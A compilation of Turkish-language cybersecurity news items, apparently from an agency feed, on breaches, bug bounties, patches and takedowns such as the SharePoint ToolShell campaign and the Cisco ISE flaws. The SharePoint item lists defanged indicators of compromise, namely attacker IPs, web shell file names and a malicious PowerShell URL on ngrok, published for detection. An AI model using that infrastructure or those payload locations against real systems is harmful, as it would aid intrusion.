CISA Tehdit Avcılığı Başkan Yardımcısı Jermaine Roebuck, “Thorium’u açık kaynak olarak sunarak, siber güvenlik topluluğunun zararlı yazılım ve adli analiz için gelişmiş araçları daha etkili şekilde kullanmasını sağlıyoruz.” dedi. Roebuck ayrıca, platformun sadece zararlı yazılımlar değil, potansiyel olarak güvenli yazılımlardaki zafiyetleri de analiz etme olanağı sunduğunu vurguladı.

Thorium’a ait kurulum dökümanları ve kaynak kodları CISA’nın resmî GitHub hesabı üzerinden erişime açıldı.

CISA, bu adımı geçtiğimiz yıl açık kaynak olarak yayımladığı Malware Next-Gen analiz sistemi ve bu hafta duyurduğu Eviction Strategies Tool ile destekledi. Ajans ayrıca kritik altyapı tesislerine yönelik ücretsiz güvenlik taramaları sunmaya da devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft, .NET ve ASP.NET Core platformlarındaki güvenlik açıklarını tespit eden araştırmacılar için ödül miktarlarını artırdığını ve hata ödül programının kapsamını genişlettiğini duyurdu. Yeni sistemle birlikte, kritik uzaktan kod çalıştırma ve ayrıcalık yükseltme açıkları için ödül miktarı 40.000 dolara kadar çıkabilecek.

Microsoft’ta Araştırmacı Teşvikleri ve Ödül Programları Kıdemli Yöneticisi Madeline Eckert, yapılan değişikliklerin, .NET güvenlik açıklarının keşfi ve sömürülmesindeki teknik karmaşıklığın daha doğru bir şekilde yansıtılmasını amaçladığını belirtti.

Yeni Ödül Yapısı:

• 40.000 dolar: Kritik uzaktan kod çalıştırma ve ayrıcalık yükseltme açıkları
• 30.000 dolar: Güvenlik özelliklerini atlatmaya yönelik kritik açıklar
• 20.000 dolara kadar: Uzaktan hizmet dışı bırakma (DoS) türündeki kritik açıklar

Ödül Programına Yeni Dahil Edilen Teknolojiler:

• Tüm desteklenen .NET ve ASP.NET sürümleri
• F# gibi ilişkili teknolojiler
• .NET Framework için desteklenen ASP.NET Core sürümleri
• Resmi şablonlar
• .NET ve ASP.NET Core GitHub depolarında yer alan GitHub Actions bileşenleri

Bu gelişme, Microsoft’un 2023 yılında başlattığı "Secure Future Initiative (SFI)" adlı güvenlik mühendisliği planı kapsamında atılan adımlardan biri olarak öne çıkıyor. Program, şirketin yazılım ürünlerinde güvenliği artırmak amacıyla geliştirdiği uzun vadeli stratejinin bir parçası.

2025 yılı içinde Microsoft ayrıca Power Platform ve Dynamics 365 ürünlerinde yapay zekâ güvenlik açıklarına yönelik ödülleri 30.000 dolara çıkarmış, Copilot için orta düzey güvenlik açıklarına verilen ödülleri artırmış ve tüm Copilot açıkları için %100 ödül çarpanı uygulamaya başlamıştı.

Şirket geçen yıl düzenlediği Ignite konferansında bulut ve yapay zekâ sistemlerine odaklanan "Zero Day Quest" isimli bir etkinlik düzenlemiş, toplamda 4 milyon dolarlık ödül havuzu açıklamıştı.

Bu adımlar, ABD İç Güvenlik Bakanlığı'nın 2023 sonunda yayımladığı ve Microsoft’un güvenlik kültürünü “yetersiz” olarak nitelendiren raporunun ardından hayata geçirilen yapısal değişikliklerin parçası olarak değerlendiriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft, Excel kullanıcılarını etkileyen yeni bir güvenlik önlemini hayata geçireceğini duyurdu. 2025 yılı Ekim ayından başlayarak, 2026 Temmuz ayına kadar sürecek aşamalı bir dağıtımla, Excel çalışma kitaplarında engellenen dosya türlerine verilen dış bağlantılar varsayılan olarak devre dışı bırakılacak.

Bu değişiklik, Microsoft 365 içinde yeni sunulan FileBlockExternalLinks grup ilkesi kapsamında uygulanacak. Politika etkinleştirildiğinde ya da yapılandırılmadığında, engellenmiş dosya türlerine yapılacak dış bağlantılar çalışma kitabında "#BLOCKED" hatası gösterecek veya bağlantı yenileme işlemi başarısız olacak.

Microsoft, çarşamba günü Microsoft 365 yönetici merkezinde yayımladığı açıklamada, bu yeni davranışı kullanıcıların önceden fark edebilmesi için Excel’in Build 2509 sürümüyle birlikte uyarı çubuğu göstermeye başlayacağını bildirdi. Build 2510 sürümünden itibaren ise politika yapılandırılmamışsa dış bağlantıların yenilenmesi veya oluşturulması mümkün olmayacak.

Şirket açıklamasında, “Varsayılan ayar yapılandırılmazsa ilk etapta herhangi bir değişiklik olmayacak. Ancak Ekim 2025 itibarıyla Trust Center tarafından halihazırda engellenen dosya türlerine dış bağlantılar otomatik olarak engellenecek.” ifadeleri yer aldı.

Bu değişikliğin etkilerini en aza indirmek isteyen yöneticiler, belirtilen kayıt defteri yolunu kullanarak (HKCU\Software\Microsoft\Office\Excel\Security\FileBlock\FileBlockExternalLinks) bağlantı yenileme özelliğini manuel olarak yeniden etkinleştirebilecek.

Microsoft bu politika ile birlikte Excel’deki dış bağlantılar üzerinden yapılan oltalama saldırılarına ve kötü amaçlı yüklemelere karşı önlem almayı hedefliyor. Değişiklik, Microsoft’un son yıllarda Office ve Windows ürünlerinde güvenliği artırmaya yönelik attığı adımların bir parçası.

2025 yılı boyunca Microsoft ayrıca Outlook’ta .library-ms ve .search-ms uzantılarını engellenen ekler listesine eklemiş, Microsoft 365 ve Office 2024 uygulamalarında ActiveX kontrollerini tamamen devre dışı bırakmıştı.

Bu önlemler, Microsoft’un 2018'de Office uygulamalarında Antimalware Scan Interface (AMSI) desteğini genişletmesiyle başlayan daha geniş kapsamlı bir güvenlik stratejisinin devamı niteliğinde. Şirket daha önce Office makrolarını varsayılan olarak engellemiş, XLM makrolarını devre dışı bırakmış, VBScript desteğini sonlandıracağını açıklamış ve güvenilmeyen XLL eklentilerini engellemeye başlamıştı.

Aynı gün içinde Microsoft, .NET ve ASP.NET Core açıkları için verilen ödül tutarını 40.000 dolar seviyesine çıkardığını da duyurdu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Uluslararası iş birliğiyle yürütülen bir operasyon kapsamında, dünyanın en büyük Rusça konuşulan siber suç forumlarından biri olan XSS.is kapatıldı. Forumun yöneticisi, 22 Temmuz 2025 tarihinde Ukrayna'nın başkenti Kiev'de yakalandı. Operasyon, Fransız polisi, Ukrayna makamları ve Europol'ün ortak çalışmasıyla gerçekleştirildi.

4 Yıllık Soruşturma Süreci

Paris Emniyet Müdürlüğü Siber Suç Birimi tarafından 2 Temmuz 2021 tarihinde başlatılan kapsamlı soruşturma sonucunda forumun faaliyetlerine dair çok sayıda veri toplandı. Fransız kolluk kuvvetleri, XSS forumuyla bağlantılı olan thesecure.biz adlı Jabber sunucusu üzerinden iletişimleri takip etti. Bu takip sonucunda yakalanan kişinin, çok sayıda yasa dışı siber suç ve fidye yazılımı operasyonuyla bağlantılı olduğu belirlendi.

Forumun Geçmişi ve Rolü

2013 yılında DaMaGeLab adıyla kurulan ve 2018'de XSS.is ismini alan platform, siber suç dünyasında köklü bir geçmişe sahipti. 50 binden fazla kayıtlı kullanıcısıyla XSS.is, kötü amaçlı yazılım satışı, sistemlere izinsiz erişim, çalıntı veri ticareti ve fidye yazılım hizmetleri gibi faaliyetlerin merkezi konumundaydı. Ayrıca forum, şifreli Jabber sunucusu üzerinden siber suçlular arasında anonim iletişim imkânı da sunuyordu.

Mali Boyut ve Yasal Süreç

Europol tarafından yapılan açıklamaya göre, gözaltına alınan şüphelinin forum üzerinden 7 milyon eurodan fazla gelir elde ettiği belirlendi. Şüphelinin sadece teknik altyapıyı yönetmediği, aynı zamanda suçlular arası anlaşmazlıkları çözdüğü ve işlemlerin güvenliğini sağladığı kaydedildi.

Şüpheli hakkında 9 Kasım 2021 tarihinde “veri işleme sistemlerine yönelik saldırılara yardım ve yataklık”, “örgütlü gasp” ve “suç örgütü üyeliği” suçlamalarıyla yasal işlem başlatıldı. Bu operasyon, karanlık ağ üzerindeki benzer platformlara yönelik süren uluslararası baskının bir parçası olarak değerlendiriliyor.

Kapanmanın Etkisi

Uzmanlara göre, geniş kullanıcı kitlesine sahip XSS.is gibi yerleşik platformların kapatılması, siber suç ekosisteminde ciddi boşluklara neden olabilir. Bu gelişme, karanlık ağda faaliyet gösteren suç ağlarına yönelik uluslararası iş birliğinin önemini bir kez daha ortaya koydu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dell tarafından BleepingComputer’a yapılan açıklamada, saldırıya uğrayan ortamın şirketin müşterilerine ürün ve çözüm tanıtımı yaptığı, ticari amaçlı yapılandırılmış bir gösterim ortamı olduğu ve gerçek müşteri sistemleri ile doğrudan bağlantısının bulunmadığı vurgulandı.

Şirket, sızdırılan verilerin büyük bölümünün sahte veri setleri, genel erişime açık test verileri ve sistem çıktılarından oluştuğunu ifade etti. Buna ek olarak, gerçek olduğu doğrulanan tek verinin eski bir iletişim listesi olduğu açıklandı.

Veriler sızdırıldı, şifreler tespit edildi
World Leaks, saldırıya ilişkin yaklaşık 1,3 terabaytlık veriyi elde ettiğini öne sürerek bir kısmını sızdırdı. Yayınlanan verilerde ağırlıklı olarak yapılandırma betikleri, sistem yedekleri ve çeşitli BT uygulamalarına ait veriler bulunuyor. Bazı dosyalarda, ekipman kurulumunda kullanılan iç sistem şifrelerinin de yer aldığı belirlendi.

Dell, saldırının nasıl gerçekleştiğine ve fidye taleplerine dair ayrıntı vermediğini, olayın hala incelenmekte olduğunu bildirdi.

Hunters International’dan World Leaks’e dönüşüm
World Leaks grubu, 2023 sonunda başlatılan ve daha önce Hive fidye yazılımıyla bağlantılı olduğu değerlendirilen Hunters International adlı grubun yeniden markalanmış hali olarak biliniyor. Grup, 2025 başında ransomware yerine sadece veri gaspı yöntemine odaklanacağını duyurarak ismini değiştirmişti.

Bu tarihten itibaren World Leaks, 49 farklı kuruluşun verilerini kamuya açık internet sitelerinde yayımladı. Grup, son dönemde SonicWall SMA 100 cihazlarındaki güvenlik açıklarını da kullanarak bazı kurumlara özel rootkit araçlarıyla erişim sağladı. Macnica'dan tehdit araştırmacısı Yutaka Sejiyama, yayımlanan 46 kuruluştan 10’unun söz konusu cihazları kullandığını belirtti.

World Leaks şu an itibarıyla Dell'i resmi sızıntı listesine eklemiş değil. Ancak veriler kamuoyuna açılmaya başlandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

CrushFTP tarafından yapılan açıklamada, söz konusu güvenlik zafiyetinin 18 Temmuz 2025 tarihinde aktif olarak istismar edildiği ve saldırganların yazılım kodunu tersine mühendislik yöntemiyle analiz ederek daha önce düzeltilmiş olan bir hatayı hedef aldığı ifade edildi.

"Güncelleme yapan kullanıcılar etkilenmedi"
Şirket, açık nedeniyle yalnızca güncellemelerini yapmayan sistemlerin hedef alındığını, en güncel sürümü kullanan sunucuların bu açıklardan etkilenmediğini vurguladı. Ayrıca, ana sunucudan izole şekilde yapılandırılan DMZ (Demilitarized Zone) sistemlerinin de güvende olduğu bildirildi.

Kullanıcılara, yükleme ve indirme günlüklerinin şüpheli etkinlikler açısından incelenmesi, otomatik güncellemelerin aktif hale getirilmesi ve yönetim paneline yalnızca izinli IP adreslerinden erişim sağlanması tavsiye ediliyor.

Shadowserver: 1.040 sunucu hala savunmasız
Siber tehdit izleme platformu Shadowserver’ın gerçekleştirdiği taramalara göre, dünya genelinde yaklaşık 1.040 CrushFTP sunucusu hala söz konusu açıklara karşı yamalanmamış durumda. Shadowserver, bu sunucuların yöneticilerini bilgilendirmeye başladığını açıkladı.

Saldırıların veri hırsızlığı mı yoksa kötü amaçlı yazılım yükleme amaçlı mı olduğu henüz netleşmemiş olsa da, son yıllarda yönetilen dosya transfer yazılımları fidye yazılım gruplarının öncelikli hedefleri arasında yer alıyor.

Clop grubu benzer sistemleri daha önce hedef aldı
Clop adlı siber suç grubu, daha önce Accelion FTA, GoAnywhere MFT, MOVEit Transfer ve Cleo yazılımında bulunan sıfırıncı gün açıklarını kullanarak geniş çaplı veri hırsızlığı saldırıları gerçekleştirmişti.

CrushFTP, Nisan 2024'te CVE-2024-4040 kodlu başka bir sıfır gün açığını kapatmış, o dönemde saldırıların ABD’deki bazı kurumları hedef aldığı ve siyasi amaçlı olabileceği değerlendirilmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dior tarafından gönderilen bilgilendirme mektuplarında, saldırının şirketin müşteri bilgilerini barındıran bir veritabanına yönelik olduğu ifade edildi. Yapılan iç inceleme sonucunda, yetkisiz bir kişinin veritabanına erişim sağladığı ve bazı kişisel bilgileri ele geçirdiği belirtildi.

Sızdırılan bilgiler arasında şu verilerin yer aldığı bildirildi:

• Tam ad

• İletişim bilgileri

• Fiziksel adres

• Doğum tarihi

• Pasaport veya resmi kimlik numarası (bazı durumlarda)

• Sosyal güvenlik numarası (bazı durumlarda)

Şirket, banka veya kredi kartı bilgisi gibi finansal verilerin ele geçirilmediğini ve bu bilgilerin sızan veritabanında yer almadığını açıkladı.

Kimlik koruma hizmeti sunuluyor
Dior, etkilenen kişilere yönelik olarak iki yıl süreyle geçerli olan ücretsiz kredi izleme ve kimlik hırsızlığı koruma hizmeti sunduğunu ve bu hizmete 31 Ekim 2025’e kadar kayıt olunabileceğini duyurdu.

Olay daha önce Asya’da duyurulmuştu
Söz konusu veri ihlalinin tarihi, Dior’un daha önce Güney Kore ve Çin'de yaşanan bir güvenlik olayına dair yaptığı açıklamayla örtüşüyor. Aynı dönemde, LVMH grubuna ait başka bir marka olan Louis Vuitton da Birleşik Krallık, Güney Kore ve Türkiye'deki müşterilerini etkileyen benzer bir saldırıyı kamuoyuna duyurmuştu.

BleepingComputer tarafından edinilen bilgilere göre, Dior ve Louis Vuitton’a yönelik siber saldırılar aynı zincirin parçası. Saldırının, bir üçüncü taraf satıcının veritabanı üzerinden erişim sağlayan ShinyHunters adlı siber suç grubu tarafından gerçekleştirildiği değerlendiriliyor.

Henüz Dior’dan ABD’de kaç müşterinin etkilendiğine dair bir açıklama yapılmazken, LVMH çatısı altındaki diğer markaların da benzer bildirimlerde bulunabileceği belirtiliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açık, 25 Nisan 2025 tarihinde "Adam-X" takma adlı bir güvenlik araştırmacısı tarafından ExpressVPN’in ödül programı kapsamında rapor edildi. Şirketin açıklamasına göre sorun, dahili testler için kullanılan debug kodlarının yanlışlıkla üretim (production) sürümlerine dâhil edilmesinden kaynaklandı.

Hangi sürümler etkilendi

• Hata, sürüm 12.97 ile 12.101.0.2-beta arasındaki yapıları etkiledi.

• Düzeltme, 12.101.0.45 numaralı sürümle 18 Haziran 2025 tarihinde yayımlandı.

Şirketin açıklaması şu şekilde:
“Bir kullanıcı RDP bağlantısı kurduğunda, bu trafik VPN tünelini atlayarak doğrudan yönlendirilmiş olabilir. Bu durum şifrelemeyi etkilememiş olsa da, bağlantının VPN üzerinden değil doğrudan gerçekleştiği gözlemlenebilir hâle gelmişti.”

Bu hata, özellikle aynı yerel ağda bulunanlar veya internet servis sağlayıcıları tarafından RDP sunucusuna yapılan bağlantının fark edilmesine neden olabiliyordu. Normalde bu tür bilgiler VPN tüneli içinde gizli kalmalıydı.

Etki sınırlı ancak dikkat edilmeli
ExpressVPN, hatanın yalnızca RDP (port 3389) kullanan kullanıcıları etkilediğini ve bu protokolün genellikle bireysel kullanıcılar yerine kurumsal ya da teknik personel tarafından tercih edildiğini belirtti. Bu nedenle, genel kullanıcı kitlesi açısından riskin düşük olduğu savunuluyor.

Yine de şirket, tüm Windows kullanıcılarına 12.101.0.45 sürümüne geçmelerini ve güncellemeleri geciktirmemelerini öneriyor.

Yeni önlemler alınacak
ExpressVPN, benzer sorunların tekrar yaşanmaması için üretim sürecindeki otomasyon kontrollerini ve geliştirme test süreçlerini güçlendireceğini bildirdi.

Şirket, geçen yıl da Windows istemcisindeki split tunneling özelliğinde DNS sızıntısına yol açan başka bir sorun nedeniyle geçici olarak bu özelliği devre dışı bırakmıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ring’in açıklamasına göre, yaşanan durum bir arka uç güncellemesi sırasında Control Center ekranında cihaz bilgilerini ve giriş tarihlerini yanlış gösteren bir yazılım hatasından ibaret.

Şirketin resmi açıklamasında şu ifadeler yer aldı:
“Control Center’da bilgilerin yanlış görüntülenmesine neden olan bir sorun tespit ettik. Bu durum, arka uç sistemde yapılan bir güncellemenin sonucudur. Müşteri hesaplarına yetkisiz erişim olduğuna dair herhangi bir nedenimiz yoktur.”

Ancak kullanıcılar, açıklamanın tatmin edici olmadığını savunuyor. Özellikle İngiltere, İspanya ve Kanada gibi ülkelerden gelen giriş kayıtlarını ve bilinmeyen cihaz adlarını ekran görüntüleriyle paylaşan kullanıcılar, bunların eski girişler olamayacağını ifade etti.

Kullanıcı tepkileri sosyal medyada büyüyor
Bir kullanıcı, “Ben Derbhille kim bilmiyorum, onun iPhone’u neden benim Ring hesabımda görünüyor?” diyerek Ring’in “sadece bir hata” açıklamasına tepki gösterdi. Başka bir kullanıcı ise, "Hiç gitmediğim İspanya'dan giriş görünüyor. Bu nasıl sadece eski bir oturum olabilir?" ifadelerini kullandı.

Canlı izleme ve MFA şikayetleri endişeleri artırıyor
Bazı kullanıcılar, uygulamada canlı izleme (live view) etkinlikleri görüldüğünü ancak kendilerinin o saatlerde uygulamayı açmadıklarını belirtti. Ayrıca, yeni cihazlar eklendiğinde çok faktörlü kimlik doğrulama (MFA) uyarısı almadıklarını rapor eden kullanıcılar da oldu.

Amazon, 22 Temmuz’da BleepingComputer’a yaptığı açıklamada tekrar "bu durumun kullanıcıların hesap güvenliğini tehlikeye atan bir ihlal olmadığını" söyledi. Şirket sözcüsü, kullanıcıların daha önce giriş yaptığı cihazlar, paylaşılan hesap erişimleri ve artık kullanılmayan cihazların sistemde görünmeye devam edebileceğini belirtti.

Ring ne öneriyor
Kullanıcılara, Ring uygulamasında Control Center > Authorized Client Devices bölümünden yetkilendirilmiş cihazları kontrol etmeleri, tanımadıkları cihazları kaldırmaları ve hesap şifresini değiştirmeleri önerildi. Ayrıca, iki faktörlü kimlik doğrulamanın (2FA) etkinleştirilmesi tavsiye edildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Clear Linux, Intel donanımlarında yüksek verimlilik sağlamak üzere özel olarak optimize edilen, modüler ve minimalist yapıya sahip bir Linux dağıtımıydı. Özellikle yazılım geliştiriciler, sunucu yöneticileri ve performans tutkunları için tasarlanmıştı.

Intel’den yapılan açıklamada şu ifadelere yer verildi:
“Bugünden itibaren Intel, Clear Linux OS için herhangi bir güvenlik yaması, güncelleme veya bakım hizmeti sunmayacaktır. Kullanıcıların, güvenlik ve kararlılık açısından aktif olarak sürdürülen başka bir Linux dağıtımına geçiş yapmaları önemle tavsiye edilir.”

Kapanış gerekçesi net değil ancak işaretler belli
Intel, projenin neden sona erdirildiğine dair resmi bir gerekçe paylaşmadı. Ancak, düşük kullanıcı ilgisi, özel paket ve güncelleme sistemi nedeniyle yüksek mühendislik maliyeti ve Intel’in stratejik kaynaklarını daha verimli projelere yöneltme politikası bu kararda etkili olmuş olabilir.

Clear Linux, başka bir dağıtımdan türetilmediği için bağımsız bir altyapıya sahipti. Bu durum, her bileşenin sıfırdan yönetilmesini gerektiriyor ve önemli mühendislik kaynakları talep ediyordu.

Intel, Linux katkılarını sürdürecek
Intel, Clear Linux projesini sonlandırsa da Linux ekosistemine olan katkılarının süreceğini belirtti. Şirket, Intel donanımları için geliştirilen optimizasyonların, diğer Linux dağıtımlarına ve açık kaynak projelere entegre edileceğini ifade etti.

Kullanıcılar için acil geçiş önerisi
Clear Linux kullananlara, sistemlerinin kısa süre içinde bilinen güvenlik açıklarına karşı savunmasız kalabileceği uyarısı yapıldı. Bu nedenle, kullanıcıların hızlı bir şekilde başka bir aktif Linux dağıtımına geçiş yapması öneriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft’un Salı günü yayımladığı teknik rapora göre, saldırılar Linen Typhoon ve Violet Typhoon isimli iki Çin devlet destekli aktör ile ilişkilendirildi. Ayrıca Storm-2603 kod adıyla izlenen bir başka Çin merkezli grubun da aynı güvenlik açıklarını kullandığı doğrulandı.

Hedefler: Kamu kurumları, yazılım şirketleri, telekom sektörü
Hollanda merkezli Eye Security şirketi, saldırıların ilk olarak 7 Temmuz'da tespit edildiğini ve en az 54 kurumun etkilendiğini açıkladı. Bu kurumlar arasında çok uluslu şirketler ve bazı hükümet organları yer alıyor. Check Point tarafından yapılan açıklamada ise saldırıların Kuzey Amerika ve Batı Avrupa’da kamu, telekomünikasyon ve yazılım sektörlerini hedef aldığı belirtildi.

Zafiyet zinciri ve CVE kodları
Söz konusu saldırılar, CVE-2025-49704 ve CVE-2025-49706 kodlu iki SharePoint açığını istismar ederek başladı. Microsoft, 16 Temmuz’daki Yama Salı (Patch Tuesday) güncellemeleriyle bu açıkları kapattı ve sonrasında yeni tanımlanan açıklar için CVE-2025-53770 ve CVE-2025-53771 kodlarını verdi.

Bu açıklar, kimlik doğrulama gerektirmeden saldırganların SharePoint içeriklerine tam erişim sağlamasına ve ağ üzerinden kod yürütmesine olanak tanıyor. Microsoft, SharePoint 2016, 2019 ve Abonelik sürümleri için acil yama güncellemeleri yayımladı.

PoC istismarı yayımlandı, saldırı riski arttı
Microsoft’un yamaları yayımlamasının ardından, CVE-2025-53770 için bir PoC (kavramsal ispat) kodu GitHub üzerinde paylaşıldı. Bu durum, daha fazla saldırganın açığı kullanma riskini artırıyor. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), bu zafiyeti “Bilinen İstismar Edilen Güvenlik Açıkları” listesine ekledi ve tüm federal kurumlara yamaları ivedilikle uygulama talimatı verdi.

ToolShell saldırı zinciri neler içeriyor
CISA'nın açıklamasına göre ToolShell, yetkisiz sistem erişimi sağlayarak dosya sistemleri ve yapılandırmalar dahil olmak üzere tüm SharePoint içeriklerine ulaşılmasına ve komut çalıştırılmasına olanak tanıyor.

Microsoft ayrıca güvenlik ekiplerinin ağlarında kompromize olmuş SharePoint sunucularını tespit etmesine yardımcı olmak amacıyla aşağıdaki göstergeleri (IOC) paylaştı:

• IP adresleri:
  134.199.202[.]205
  104.238.159[.]149
  188.130.206[.]168
  131.226.2[.]6 (komuta ve kontrol sunucusu)

• Web shell dosyaları:
  Spinstall0.aspx, spinstall.aspx, spinstall1.aspx, spinstall2.aspx

• Kötü amaçlı PowerShell bağlantısı:
  c34718cbb4c6.ngrok-free[.]app/file.ps1

Tavsiye edilen adımlar
CISA ve Microsoft, SharePoint sunucularını yerel (on-premise) olarak kullanan tüm kurumlara acilen yamaları uygulama, ağ trafiğini izleme ve sistem güncellemelerini tamamlama çağrısında bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Güvenlik Bakanı Dan Jarvis, yasa ile fidye yazılımı gruplarının iş modelini hedef aldıklarını belirterek, "Değişim Planımızı uygularken, kamu hizmetlerini korumaya ve fidye yazılımlarına karşı birleşik duruş sergilemeye kararlıyız" dedi.

Fidye ödemeleri ciddi riskler doğuruyor
Hükümet açıklamasında, fidye yazılımlarının İngiltere ekonomisine her yıl milyonlarca sterlinlik zarar verdiği belirtildi. Ayrıca bu saldırıların operasyonel aksaklıklardan finansal kayıplara ve hatta hayati risklere kadar birçok ciddi sonuca yol açtığına dikkat çekildi.

Yeni düzenlemeyle kamu kurumlarının fidye ödeyerek saldırganları finanse etmesi önlenecek ve bu kurumların daha az cazip hedefler haline gelmesi sağlanacak.

Özel sektör için bildirim zorunluluğu geliyor
Yasa kapsamına girmeyen özel sektör kuruluşlarının fidye ödemesi yapmadan önce devlete bildirimde bulunması gerekecek. Bu aşamada, ödemenin yaptırımlara tabi siber suç gruplarına gitme riski değerlendirilecek. Bu grupların çoğu Rusya merkezli olarak tanımlanıyor.

Ayrıca, fidye yazılımı saldırılarına ilişkin zorunlu bildirim sistemi de kurulacak. Bu sistem sayesinde kolluk kuvvetlerinin saldırganları tespit etmesi ve mağdurlara destek sağlaması hedefleniyor.

Kapsamlı bir kamuoyu danışma süreci yürütüldü
Ocak 2025’te başlatılan kamuoyu danışma süreci kapsamında, kamu sektörü ve ulusal altyapı kuruluşlarının fidye ödemelerinin yasaklanması, fidye ödemelerinin caydırılması ve olay bildirimlerinin zorunlu hale getirilmesi gibi adımlar önerilmişti.

Ransomware, İngiltere’de ulusal güvenlik sorunu olarak değerlendiriliyor
Ulusal Siber Güvenlik Merkezi (NCSC) ve Ulusal Suç Ajansı (NCA), fidye yazılımlarını ülkenin karşı karşıya olduğu en büyük siber suç tehdidi olarak tanımlıyor. Son yıllarda NHS, British Library, Marks & Spencer, Co-op ve Harrods gibi önemli kurumlar bu tür saldırıların hedefi oldu.

Özellikle Nisan 2025’te Marks & Spencer’ın DragonForce isimli fidye yazılımıyla karşılaştığı saldırı sonrası çevrimiçi siparişler durdurulmuş, 1.400 mağazada operasyonlar aksaklığa uğramıştı. Co-op ise güncel ve eski üyelere ait verilerin sızdırıldığını doğrulamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Cisco Güvenlik İstihbarat Ekibi (PSIRT) tarafından yayımlanan güncel uyarıda, "Temmuz 2025 itibarıyla bu açıkların bazılarına yönelik sahada istismar girişimleri gözlemlenmiştir" denildi. Şirket, etkilenen sistem yöneticilerinin acilen ilgili yamaları yüklemesini tavsiye etti.

Açıkların detayları ve etki alanı
Cisco tarafından sırasıyla 25 Haziran ve 16 Temmuz 2025 tarihlerinde duyurulan açıklar, aşağıdaki gibi sınıflandırıldı:

• CVE-2025-20281: Cisco ISE ve ISE-PIC yazılımlarında kimlik doğrulama gerektirmeyen uzaktan kod çalıştırma açığı. Özel olarak hazırlanmış API istekleriyle saldırgan, işletim sisteminde root yetkisiyle komut çalıştırabiliyor.
  Düzeltilen sürümler: ISE 3.3 Patch 7 ve ISE 3.4 Patch 2

• CVE-2025-20282: Cisco ISE 3.4 sürümünde dosya doğrulaması yapılmayan bir alan aracılığıyla kötü niyetli dosyaların yüklenip root yetkisiyle çalıştırılmasına olanak tanıyan dosya yükleme açığı.
  Düzeltilen sürüm: ISE 3.4 Patch 2

• CVE-2025-20337: Cisco ISE ve ISE-PIC sistemlerinde yetersiz veri doğrulama nedeniyle API istekleri üzerinden uzaktan kod çalıştırma açığı.
  Düzeltilen sürümler: ISE 3.3 Patch 7 ve ISE 3.4 Patch 2

Üç açık da maksimum risk seviyesinde değerlendirilirken (CVSS skoru: 10.0), kimlik doğrulama gerektirmemeleri nedeniyle özellikle yüksek risk taşıyor.

Yamaların önemi ve önerilen adımlar
Cisco, söz konusu açıklar için geçici çözüm (workaround) bulunmadığını ve yalnızca yamaların uygulanmasının etkili olduğunu vurguladı. Güvenliğe ilişkin önerilen güncelleme adımları şu şekilde sıralandı:

• ISE 3.3 kullanıcıları: Patch 7 sürümüne yükseltmeli

• ISE 3.4 kullanıcıları: Patch 2 sürümüne yükseltmeli

• ISE 3.2 veya daha eski sürümler: Bu açıklardan etkilenmediği için herhangi bir işlem gerekmiyor

Şirket, yamaların uygulanmasında gecikilmesinin sistemlere dışarıdan sızma riskini artıracağını belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri ihlali, Avrupa Birliği Genel Veri Koruma Tüzüğü (GDPR) kapsamında kamuya duyuruldu. AMEOS, GDPR’nin 34. maddesi uyarınca potansiyel olarak etkilenen bireyleri bilgilendirme yükümlülüğünü yerine getirdi.

Üç ülkede 100’den fazla sağlık tesisi
Zürih merkezli AMEOS Group, İsviçre, Almanya ve Avusturya’da hastane, klinik, rehabilitasyon merkezi ve bakım evi olmak üzere 100’ün üzerinde tesiste 18.000 kişiyi istihdam ediyor. Kurum, 10.000’i aşkın yatak kapasitesi ve 1,4 milyar doların üzerindeki yıllık geliriyle DACH bölgesindeki en büyük özel sağlık hizmeti sağlayıcılarından biri konumunda.

Yetkisiz erişim ve olası veri suistimali
Açıklamaya göre, tüm güvenlik önlemlerine rağmen sistemlere yetkisiz erişim sağlandı. Etkilenen veriler arasında hasta bilgileri, çalışan ve ortaklara ait kişisel ve iletişim verileri yer alıyor.

“Size ya da şirketinize ait iletişim bilgileri ile birlikte hastalar, çalışanlar ve iş ortaklarına ait veriler, izinsiz erişim nedeniyle etkilenmiş olabilir. Bu verilerin internette kötü niyetli şekilde kullanılması ya da üçüncü taraflarla paylaşılması ihtimali göz ardı edilemez.” ifadeleriyle kamuoyu bilgilendirildi.

Sistemler kapatıldı, dış destek alındı
Saldırının ardından tüm IT sistemleri devre dışı bırakılırken, iç ve dış ağ bağlantıları kesildi. AMEOS, mevcut önlemleri güçlendirerek siber güvenlik ve adli bilişim alanında uzman dış ekiplerle çalışmaya başladı.

Olayla ilgili olarak ilgili ülkelerdeki veri koruma otoritelerine bilgi verildi ve polise suç duyurusunda bulunuldu. Kurumdan sağlık hizmeti alan kişilere, olası kimlik avı ve dolandırıcılık girişimlerine karşı dikkatli olmaları uyarısı yapıldı.

Henüz veri sızıntısı tespit edilmedi
AMEOS, şu ana kadar çalınan verilerin internette paylaşıldığına dair herhangi bir kanıt bulunmadığını belirtti. Soruşturmanın sürdüğünü ve gelişmeler oldukça kamuoyuna bilgi verileceğini açıkladı.

“Şu anda kişisel verilerinizin gerçekten sızdırıldığına dair somut bir bulgu bulunmamaktadır. İnceleme tamamlandığında bu sayfa üzerinden bilgilendirme yapılacaktır.” denildi.

Saldırının fidye yazılımı kaynaklı olup olmadığı veya herhangi bir veri şifreleme işlemi gerçekleşip gerçekleşmediği henüz bilinmiyor. Şu ana dek herhangi bir fidye yazılımı grubu saldırının sorumluluğunu üstlenmedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Haziran 2025’e kadar olan saldırıların incelenmesiyle elde edilen bulgular, uyarı metninde yer alan siber tehdit göstergeleri (IoC) ve savunma önlemleriyle birlikte kamuoyuyla paylaşıldı.

Hedef: Sağlık sektörü ve kritik altyapılar
